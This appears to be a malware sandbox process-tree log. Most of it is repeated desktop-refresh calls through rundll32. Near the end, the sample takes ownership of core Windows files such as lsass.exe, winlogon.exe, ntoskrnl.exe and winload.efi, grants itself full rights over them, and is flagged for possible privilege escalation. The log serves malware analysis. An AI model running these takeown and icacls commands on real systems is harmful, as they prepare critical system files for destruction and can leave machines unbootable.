C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2212
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1548
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1676
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:764
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2188
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2080
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1220
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2084
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1528
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2896
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1620
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2320
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1100
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1724
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2908
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1180
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:732
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2100
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2556
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2652
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2460
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2360
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2852
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2144
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:760
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1108
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:540
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1988
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1712
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2636
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2408
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2696
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2684
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3056
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2208
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2772
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:820
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1808
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:956
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2128
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2988
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:888
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2260
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1612
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2304
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1220
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2212
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2560
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:856
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1148
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2492
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:716
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:728
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2776
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2548
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2660
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2468
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2848
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2856
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:320
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2012
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:996
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1120
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1588
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2388
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2712
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1844
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1788
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:904
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1864
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1920
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2992
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1532
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2100
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:956
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2652
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1612
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1756
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1072
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2156
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2084
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1228
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1548
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2780
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1760
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2464
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2588
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit2⤵PID:2392
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\smss.exe3⤵PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit2⤵PID:2948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\csrss.exe3⤵
- Modifies file permissions
PID:380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit2⤵PID:2328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\wininit.exe3⤵PID:2008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit2⤵PID:868
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"3⤵PID:2240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit2⤵PID:524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\lsass.exe3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit2⤵PID:1360
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\services.exe3⤵
- Possible privilege escalation attempt
PID:1476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit2⤵PID:1940
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winlogon.exe3⤵PID:440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit2⤵PID:1068
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.efi3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.efi /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit2⤵PID:1364
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.exe3⤵
- Possible privilege escalation attempt
PID:576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:1232
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\ntoskrnl.exe3⤵
- Modifies file permissions
PID:1004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit2⤵PID:1216
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\svchost.exe3⤵PID:2344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\smss.exe && icacls C:\Windows\SysWOW64\smss.exe /grant "%username%:F" && exit2⤵PID:2032
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\smss.exe3⤵PID:656
-
-
-
